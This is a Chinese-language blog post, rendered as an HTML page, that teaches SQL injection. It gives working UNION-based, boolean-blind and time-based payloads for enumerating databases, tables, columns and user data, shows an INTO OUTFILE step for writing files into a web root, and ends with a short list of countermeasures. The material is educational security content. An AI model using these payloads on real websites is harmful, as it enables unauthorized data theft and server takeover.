<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">




<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

  <meta name="author" content="John Doe">





<title>SQL注入 | Hexo</title>



<link rel="icon" href="/favicon.png">



<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/nprogress/nprogress.css">



<script src="/lib/jquery.min.js"></script>


<script src="/lib/iconify-icon.min.js"></script>


<script src="https://cdn.tailwindcss.com?plugins=typography"></script>
<script>
  tailwind.config = {
    darkMode: "class",
  };
</script>


<script src="/lib/nprogress/nprogress.js"></script>

<script>
  $(document).ready(() => {
    NProgress.configure({
      showSpinner: false,
    });
    NProgress.start();
    $("#nprogress .bar").css({
      background: "#de7441",
    });
    $("#nprogress .peg").css({
      "box-shadow": "0 0 2px #de7441, 0 0 4px #de7441",
    });
    $("#nprogress .spinner-icon").css({
      "border-top-color": "#de7441",
      "border-left-color": "#de7441",
    });
    setTimeout(function () {
      NProgress.done();
      $(".fade").removeClass("out");
    }, 800);
  });
</script>

<script>
  (function () {
    const prefersDark =
      window.matchMedia &&
      window.matchMedia("(prefers-color-scheme: dark)").matches;
    const setting = localStorage.getItem("hexo-color-scheme") || "auto";
    if (setting === "dark" || (prefersDark && setting !== "light"))
      document.documentElement.classList.toggle("dark", true);
    let isDark = document.documentElement.classList.contains("dark");
  })();

  $(document).ready(function () {
    // init icon
    const prefersDark =
      window.matchMedia &&
      window.matchMedia("(prefers-color-scheme: dark)").matches;
    const isDark = document.documentElement.classList.contains("dark");
    $("#theme-icon").attr("icon", isDark ? "ri:moon-line" : "ri:sun-line");

    function toggleGiscusTheme() {
      const isDark = document.documentElement.classList.contains("dark");
      const giscusFrame = document.querySelector("iframe.giscus-frame");
      if (giscusFrame) {
        giscusFrame.contentWindow.postMessage(
          {
            giscus: {
              setConfig: {
                theme: isDark ? "dark" : "light",
              },
            },
          },
          "https://giscus.app"
        );
      }
    }


    // toggle dark mode
    function toggleDark() {
      let isDark = document.documentElement.classList.contains("dark");
      isDark = !isDark;
      const setting = localStorage.getItem("hexo-color-scheme") || "auto";
      document.documentElement.classList.toggle("dark", isDark);
      $("#theme-icon").attr("icon", isDark ? "ri:moon-line" : "ri:sun-line");
      if (prefersDark === isDark) {
        localStorage.setItem("hexo-color-scheme", "auto");
      } else {
        localStorage.setItem("hexo-color-scheme", isDark ? "dark" : "light");
      }
      toggleGiscusTheme();
    }
    $("#toggle-dark").click(toggleDark);
    // listen dark mode change
    window
      .matchMedia("(prefers-color-scheme: dark)")
      .addEventListener("change", (e) => {
        const setting = localStorage.getItem("hexo-color-scheme") || "auto";
        if (setting === "auto") {
          document.documentElement.classList.toggle("dark", e.matches);
          $("#theme-icon").attr(
            "icon",
            e.matches ? "ri:moon-line" : "ri:sun-line"
          );
          toggleGiscusTheme();
        }
      });
  });
</script>




<meta name="generator" content="Hexo 6.3.0"></head>
<body class="font-sans bg-white dark:bg-zinc-900 text-gray-700 dark:text-gray-200">
  <header class="fixed w-full px-5 py-1 z-10 backdrop-blur-xl backdrop-saturate-150 border-b border-black/5">
  <div class="max-auto">
    <nav class="flex items-center text-base">
      <a href="/" class="group">
        <h2 class="font-medium tracking-tighterp text-l p-2">
          <img class="w-5 mr-2 inline-block transition-transform group-hover:rotate-[30deg]" id="logo" src="/images/logo.svg" alt="Hexo" />
          Hexo
        </h2>
      </a>
      <div id="header-title" class="opacity-0 md:ml-2 md:mt-[0.1rem] text-xs font-medium whitespace-nowrap overflow-hidden overflow-ellipsis">
        SQL注入
      </div>
      <div class="flex-1"></div>
      <div class="flex items-center gap-3">
        
          <a class="hidden sm:flex" href="/archives">Posts</a>
        
        
          
            <a class="w-5 h-5 hidden sm:flex" title="Github" target="_blank" rel="noopener" href="https://github.com/xbmlz">
              <iconify-icon width="20" icon="ri:github-line"></iconify-icon>
            </a>
          
        
        <a class="w-5 h-5" title="toggle theme" id="toggle-dark">
          <iconify-icon width="20" icon="" id="theme-icon"></iconify-icon>
        </a>
      </div>
      <div class="flex items-center justify-center gap-3 ml-3 sm:hidden">
        <span class="w-5 h-5" aria-hidden="true" role="img" id="open-menu">
          <iconify-icon width="20" icon="carbon:menu" ></iconify-icon>
        </span>
        <span class="w-5 h-5 hidden" aria-hidden="true" role="img" id="close-menu">
          <iconify-icon  width="20" icon="carbon:close" ></iconify-icon>
        </span>
      </div>
    </nav>
  </div>
</header>
<div id="menu-panel" class="h-0 overflow-hidden sm:hidden fixed left-0 right-0 top-12 bottom-0 z-10">
  <div id="menu-content" class="relative z-20 bg-white/80 px-6 sm:px-8 py-2 backdrop-blur-xl -translate-y-full transition-transform duration-300">
    <ul class="nav flex flex-col sm:flex-row text-sm font-medium">
      
        <li class="nav-portfolio sm:mx-2 border-b sm:border-0 border-black/5 last:border-0 hover:text-main">
          <a href="/archives" class="flex h-12 sm:h-auto items-center">Posts</a>
        </li>
      
    </ul>
  </div>
  <div class="mask bg-black/20 absolute inset-0"></div>
</div>

  <main class="p-12">
    <!-- css -->

<link rel="stylesheet" href="/lib/fancybox/fancybox.min.css">


<link rel="stylesheet" href="/lib/tocbot/tocbot.min.css">

<!-- toc -->

  <!-- tocbot -->
<nav class="post-toc toc text-sm w-48 relative top-32 right-0 opacity-70 hidden lg:block" style="position: fixed !important;"></nav>


<section class="px-6 max-w-prose mx-auto md:px-0">
  <!-- header -->
  <header class="overflow-hidden pt-6 pb-6 md:pt-12">
    <div class="pt-4 md:pt-6">
      <h1 id="article-title" class="text-[2rem] font-bold leading-snug mb-4 md:mb-6 md:text-[2.6rem]">
        SQL注入
      </h1>
      <p class="mb-6">
        
      </p>
      <div>
        <section class="flex items-center gap-3 text-sm">
          <time>2023-09-16 11:42:42</time>
          <span class="text-gray-400">·</span>
          <span>7 min</span>
          <span class="text-gray-400">·</span>
          <span>2k words</span>
        </section>
      </div>
    </div>
  </header>
  <!-- content -->
  <article class="post-content mt-10 prose dark:prose-invert post-content">
    <h1 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1><p>​		攻击者通过web应用程序利用SQL语句或字符串将非法的数据插入到服务端数据库中，获取数据库的用户管理权限，然后将数据库管理用户权限升至操作系统管理用户权限，控制服务器操作系统，获取重要的信息和机密文件。所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中，然后传递到sql服务器使其解析并执行的一种攻击手法</p>
<h3 id="危害"><a href="#危害" class="headerlink" title="危害"></a>危害</h3><ul>
<li>数据泄露：数据库中存放的用户的隐私信息的泄露</li>
<li>网页篡改：通过操作数据库对特定网页进行篡改</li>
<li>网站挂马：修改数据库一些字段的值，嵌入链接，实行攻击</li>
<li>数据破坏：数据库服务器被攻击，数据库的系统管理员账户被篡改，系统瘫痪</li>
<li>服务器被远程控制：经由数据库服务器提供的操作系统支持，让我们可以修改或者控制操作系统</li>
</ul>
<h5 id="按注入点分"><a href="#按注入点分" class="headerlink" title="按注入点分"></a>按注入点分</h5><ul>
<li><p>数字型注入</p>
</li>
<li><p>字符型注入</p>
</li>
</ul>
<h5 id="按返回结果分"><a href="#按返回结果分" class="headerlink" title="按返回结果分"></a>按返回结果分</h5><ul>
<li>报错型</li>
<li>盲注型</li>
</ul>
<h5 id="按提交数据分"><a href="#按提交数据分" class="headerlink" title="按提交数据分"></a>按提交数据分</h5><ul>
<li>GET注入：在get传参时写入参数，将SQl语句闭合，后面加写入自己的SQL语句</li>
<li>POST注入：通过post传参，原理与get一样，重要的是判断我们所输入的信息是否与数据库产生交互，其次判断SQL语句是如何闭合的</li>
<li>Cookie注入：有些网站通过查询cookie判断用户是否登录，需要与数据库进行交互，我们可以修改cookie的值，查找我们所需要的东西。或者通过报错注入是网页返回报错信息</li>
</ul>
<h3 id="判断SQL注入点"><a href="#判断SQL注入点" class="headerlink" title="判断SQL注入点"></a>判断SQL注入点</h3><p>​		通常情况下，可能存在 Sql 注入漏洞的 Url 是类似这种形式 ：<a target="_blank" rel="noopener" href="http://xxx.xxx.xxx/abcd.php?id=XX">http://xxx.xxx.xxx/abcd.php?id=XX</a><br>对 Sql 注入的判断，主要有两个方面</p>
<ul>
<li><p>判断该带参数的 Url 是否存在 Sql 注入？</p>
</li>
<li><p>如果存在 Sql 注入，那么属于哪种 Sql 注入？</p>
<p>​		可能存在Sql注入攻击的ASP&#x2F;PHP&#x2F;JSP动态网页中，一个动态网页中可能只有一个参数，有时可能有多个参数。有时是整型参数，有时是字符串型参数，不能一概而论。总之只要是带有参数的动态网页且此网页访问了数据库，那么就有可能存在Sql注入。如果程序员没有足够的安全意识，没有进行必要的字符过滤，存在SQL注入的可能性就非常大</p>
</li>
</ul>
<h4 id="判断是否存在SQL注入漏洞"><a href="#判断是否存在SQL注入漏洞" class="headerlink" title="判断是否存在SQL注入漏洞"></a>判断是否存在SQL注入漏洞</h4><p>最为经典的单引号判断法：在参数后面加上单引号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://xxx/abc.php?id=1&#x27;</span><br></pre></td></tr></table></figure>

<p>如果页面返回错误，则存在Sql注入<br>原因是无论字符型还是整型都会因为单引号个数不匹配而报错<br>（如果未报错，不代表不存在Sql注入，因为有可能页面对单引号做了过滤，这时可以使用判断语句进行注入）</p>
<h4 id="判断SQL注入漏洞的类型"><a href="#判断SQL注入漏洞的类型" class="headerlink" title="判断SQL注入漏洞的类型"></a>判断SQL注入漏洞的类型</h4><h6 id="数字型判断"><a href="#数字型判断" class="headerlink" title="数字型判断"></a>数字型判断</h6><ul>
<li>Url地址中输入<code>http://xxx/abc.php?id=x and 1=1</code>页面依旧运行正常，继续进行下一步</li>
<li>Url地址中继续输入<code>http://xxx/abc.php?id=x and 1=2</code>页面运行错误，则说明此Sql注入为数字型注入</li>
</ul>
<h6 id="字符型"><a href="#字符型" class="headerlink" title="字符型"></a>字符型</h6><ul>
<li>Url地址中输入<code>http://xxx/abc.php?id=x&#39; and &#39;1&#39;=&#39;1</code>页面运行正常，继续进行下一步</li>
<li>Url地址中继续输入<code>http://xxx/abc.php?id=x&#39; and &#39;1&#39;=&#39;2</code>页面运行错误，则说明此Sql注入为字符型注入</li>
</ul>
<h5 id="判断当前表的字段个数"><a href="#判断当前表的字段个数" class="headerlink" title="判断当前表的字段个数"></a>判断当前表的字段个数</h5><p><code>?id=1 order by n --+</code></p>
<p>若n超过当前表的列数，就会报错，说明表中只有n-1列</p>
<h5 id="判断回显位"><a href="#判断回显位" class="headerlink" title="判断回显位"></a>判断回显位</h5><p>判断显示位时，要使用<code>?id=-1或者改为0</code>让前面的select语句查询为空错误，然后采用后面的select语句去查询</p>
<p><code>?id=-1’ union select 1,2,3 --+</code></p>
<p>观察页面在哪里回显我们的输入，就可以用那个地方测试接下的语句</p>
<h5 id="爆数据库名"><a href="#爆数据库名" class="headerlink" title="爆数据库名"></a>爆数据库名</h5><p>假如2号位是回显位：</p>
<p><code>?id=1’ union select 1,database(),3 --+</code></p>
<p>在之前回显2的地方会回显database数据库的名字</p>
<h5 id="爆数据库中的表"><a href="#爆数据库中的表" class="headerlink" title="爆数据库中的表"></a>爆数据库中的表</h5><p><code>?id=1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+</code></p>
<h5 id="爆表中的字段"><a href="#爆表中的字段" class="headerlink" title="爆表中的字段"></a>爆表中的字段</h5><p><code>?id=1’ union select 1,group_concat(column_name),3 from information_schema.column where table_schema=’爆出来的数据库名‘ and table_name=‘爆出来的表名’ --+</code></p>
<h5 id="爆相应字段的所有数据"><a href="#爆相应字段的所有数据" class="headerlink" title="爆相应字段的所有数据"></a>爆相应字段的所有数据</h5><p><code>?id=-1’ union select 1,group_concat(字段名),3 from users --+</code></p>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4><p>​		就是在mysql中使用指定函数来制造报错，查询的时候加一些格式错误的信息，它会提示你格式错误，可以在中间加入一些其他信息，比如select database()，报错信息后面也会出现数据库信息。利用数据库的报错信息得到数据库的内容。因此需要构造语句让数据库报错</p>
<h2 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h2><ul>
<li>求闭合字符</li>
<li>求当前数据库名的长度</li>
<li>求当前数据库名对应的ASCII值</li>
<li>求表的数量</li>
<li>求表明的长度</li>
<li>求表名对应的ASCII值</li>
<li>求字段的数量</li>
<li>求字段内容的长度</li>
<li>求字段内容对应的ASCII值</li>
</ul>
<h4 id="if语句"><a href="#if语句" class="headerlink" title="if语句"></a>if语句</h4><p> if(a&#x3D;b,1,2)</p>
<p>当a&#x3D;b为真时，返回1；当a&#x3D;b为假时，返回2</p>
<h4 id="substr语句"><a href="#substr语句" class="headerlink" title="substr语句"></a>substr语句</h4><p>substr(x,a,b)</p>
<p>从第a位开始截取“x”，每次截取b位</p>
<p>substr(‘admin’,1,1)&#x3D;’a’;substr(‘admin’,2,1)&#x3D;’d’</p>
<h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><p>​		即在页面不显示数据，只显示对错，此时我们输入的语句让页面呈现两种状态，相当于true和false，根据这两种状态判断我们输入的语句是否查询成功。因此需要构造判断语句，根据页面是否回显证实猜想</p>
<h5 id="判断当前数据库中表的个数"><a href="#判断当前数据库中表的个数" class="headerlink" title="判断当前数据库中表的个数"></a>判断当前数据库中表的个数</h5><p><code>?id=1&#39; and (select count(table_name) from information_schema.tables where table_schema=database())&gt;3 --+</code></p>
<h5 id="判断每个表的长度"><a href="#判断每个表的长度" class="headerlink" title="判断每个表的长度"></a>判断每个表的长度</h5><p><code>?id=1&#39; and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))&gt;6 --+</code></p>
<h5 id="判断每个表的每个字符的ascii值"><a href="#判断每个表的每个字符的ascii值" class="headerlink" title="判断每个表的每个字符的ascii值"></a>判断每个表的每个字符的ascii值</h5><p><code>?id=1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;100 --+</code></p>
<h5 id="判断表中的字段名"><a href="#判断表中的字段名" class="headerlink" title="判断表中的字段名"></a>判断表中的字段名</h5><h5 id="判断数据长度"><a href="#判断数据长度" class="headerlink" title="判断数据长度"></a>判断数据长度</h5><p><code>?id=1&#39; and length((select id from users limit 0,1))&gt;5 --+</code></p>
<h5 id="判断数据的ASCII值"><a href="#判断数据的ASCII值" class="headerlink" title="判断数据的ASCII值"></a>判断数据的ASCII值</h5><p><code>?id=1&#39; and ascii(substr((select id from users limit  0,1),1,1))&gt;100 --+</code></p>
<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><p>​		通过返回时间的长短判断。获取第一个字符的ascii码，判断是否大于115，不成立延时五秒返回</p>
<p><code>?id=1&#39; and if(ascii(substr(database(),2,1))= 101,sleep(5),0) --+</code></p>
<h4 id="导入到文件"><a href="#导入到文件" class="headerlink" title="导入到文件"></a>导入到文件</h4><p><code>SELECT … INTO OUTFILE ‘file_name’</code></p>
<p>可以把被选择的行写入一个文件中。该文件被创建到服务器主机上，因此您必须拥有FILE权限，才能使用此语法。file_name不能是一个已经存在的文件。两种利用形式：</p>
<ul>
<li>直接将select内容导入到文件中</li>
</ul>
<p><code>select ... into outfile &quot;c:\\phpnow\\htdocs\\test.php&quot;</code></p>
<ul>
<li>修改文件结尾</li>
</ul>
<p><code>select version() into outfile &quot;c:\\phpnow\\htdocs\\test.php&quot; LINES TERMINATED BY 0x16</code></p>
<h3 id="应对方案"><a href="#应对方案" class="headerlink" title="应对方案"></a>应对方案</h3><ul>
<li>参数过滤： 参数过滤以各种厂商以及代码的WAF为主,比如替换空格,关键字,双写,大小写,特殊字符转义</li>
<li>普通用户与系统管理员用户的权限要有严格的区分</li>
<li>预编译：预编译主要依赖各种框架,比如Java的mybatis框架 和 PHP的 thinkphp框架</li>
<li>限制权限和报错：限制权限和报错是指限制数据库的权限,以及控制数据库的报错信息,报错信息不要对外展示</li>
<li>必要的情况下使用专业的漏洞扫描工具来寻找可能被攻击的点</li>
<li>防火墙，限制同IP时间、禁IP访问、黑名单</li>
</ul>

  </article>
  <!-- tag -->
  <div class="mt-12 pt-6 border-t border-gray-200">
    
      
        <span class="bg-gray-100 dark:bg-gray-700 px-2 py-1 m-1 text-sm rounded-md transition-colors hover:bg-gray-200">
          <a href="/tags/%E6%BC%8F%E6%B4%9E/">漏洞</a>
        </span>
      
    
  </div>
  <!-- prev and next -->
  <div class="flex justify-between mt-12 pt-6 border-t border-gray-200">
    <div>
      
        <a href="/2023/08/12/PHP/" class="text-sm text-gray-400 hover:text-gray-500 flex justify-center">
          <iconify-icon width="20" icon="ri:arrow-left-s-line" data-inline="false"></iconify-icon>
          PHP
        </a>
      
    </div>
    <div>
      
        <a href="/2023/08/08/arp%E6%AC%BA%E9%AA%97/" class="text-sm text-gray-400 hover:text-gray-500 flex justify-center">
          arp欺骗
          <iconify-icon width="20" icon="ri:arrow-right-s-line" data-inline="false"></iconify-icon>
        </a>
      
    </div>
  </div>
  <!-- comment -->
  <div class="article-comments mt-12">
    

  </div>
</section>
<!-- js inspect -->

<script src="/lib/clipboard.min.js"></script>


<script async src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    "HTML-CSS": {
        preferredFont: "TeX",
        availableFonts: ["STIX","TeX"],
        linebreaks: { automatic:true },
        EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
        inlineMath: [ ["$", "$"], ["\\(","\\)"] ],
        processEscapes: true,
        ignoreClass: "tex2jax_ignore|dno",
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
        equationNumbers: { autoNumber: "AMS" },
        noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } },
        Macros: { href: "{}" }
    },
    messageStyle: "none"
  });
</script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>



<script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
<script>
  $(document).ready(() => {
    const maraidConfig = {
      theme: "default",
      logLevel: 3,
      flowchart: { curve: "linear" },
      gantt: { axisFormat: "%m/%d/%Y" },
      sequence: { actorMargin: 50 },
    };
    mermaid.initialize(maraidConfig);
  });
</script>



<script src="/lib/fancybox/fancybox.umd.min.js"></script>

<script>
  $(document).ready(() => {
    $('.post-content').each(function(i){
      $(this).find('img').each(function(){
        if ($(this).parent().hasClass('fancybox') || $(this).parent().is('a')) return;
        var alt = this.alt;
        if (alt) $(this).after('<span class="fancybox-alt">' + alt + '</span>');
        $(this).wrap('<a class="fancybox-img" href="' + this.src + '" data-fancybox=\"gallery\" data-caption="' + alt + '"></a>')
      });
      $(this).find('.fancybox').each(function(){
        $(this).attr('rel', 'article' + i);
      });
    });

    Fancybox.bind('[data-fancybox="gallery"]', {
        // options
    })
  })
</script>

<!-- tocbot begin -->

<script src="/lib/tocbot/tocbot.min.js"></script>

<script>
  $(document).ready(() => {
      tocbot.init({
        // Where to render the table of contents.
        tocSelector: '.post-toc',
        // Where to grab the headings to build the table of contents.
        contentSelector: '.post-content',
        // Which headings to grab inside of the contentSelector element.
        headingSelector: 'h1, h2, h3',
        // For headings inside relative or absolute positioned containers within content.
        hasInnerContainers: true,
    });
  })
</script>
<!-- tocbot end -->


  </main>
  <footer class="flex flex-col h-40 items-center justify-center text-gray-400 text-sm">
  <!-- busuanzi -->
  
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<!-- Busuanzi Analytics -->
<div class="flex items-center gap-2">
  <span>Visitor Count</span>
  <span id="busuanzi_value_site_uv"></span>
  <span>Totalview</span>
  <span id="busuanzi_value_site_pv"></span>
</div>
<!-- End Busuanzi Analytics -->


  <!-- copyright -->
  <div class="flex items-center gap-2">
    <span>© 2022</span>
    <iconify-icon width="18" icon="emojione-monotone:maple-leaf" ></iconify-icon>
    <a href="https://github.com/xbmlz" target="_blank" rel="noopener noreferrer">xbmlz</a>
  </div>
  <!-- powered by -->
  <div class="flex items-center gap-2">
    <span>Powered by</span>
    <a href="https://hexo.io/" target="_blank" rel="noopener noreferrer">Hexo</a>
    <span>&</span>
    <a href="https://github.com/xbmlz/hexo-theme-maple" target="_blank" rel="noopener noreferrer">Maple</a>
  </div>

</footer>

  <iconify-icon class="fixed right-4 bottom-10 z-100 opacity-0" width="24" icon="ion:arrow-up-c" id="go-top"></iconify-icon>
  
<script src="/js/main.js"></script>


  <script>
    $(document).ready(function () {
      const mapleCount = "10";
      const speed = "0.5";
      const mapleEl = document.getElementById("maple");
      const maples = Array.from({ length: mapleCount }).map(() => {
        const maple = document.createElement("div");
        const scale = Math.random() * 0.5 + 0.5;
        const offset = Math.random() * 2 - 1;
        const x = Math.random() * mapleEl.clientWidth;
        const y = -Math.random() * mapleEl.clientHeight;
        const duration = 10 / speed;
        const delay = -duration;
        maple.className = "maple";
        maple.style.width = `${24 * scale}px`;
        maple.style.height = `${24 * scale}px`;
        maple.style.left = `${x}px`;
        maple.style.top = `${y}px`;
        maple.style.setProperty("--maple-fall-offset", offset);
        maple.style.setProperty("--maple-fall-height", `${Math.abs(y) + mapleEl.clientHeight}px`);
        maple.style.animation = `fall ${duration}s linear infinite`;
        maple.style.animationDelay = `${delay}s`;
        mapleEl.appendChild(maple)
        return maple
      })
    });
  </script>
  


  <div class="w-screen h-screen -z-999" id="maple"></div>
</body>

</html>
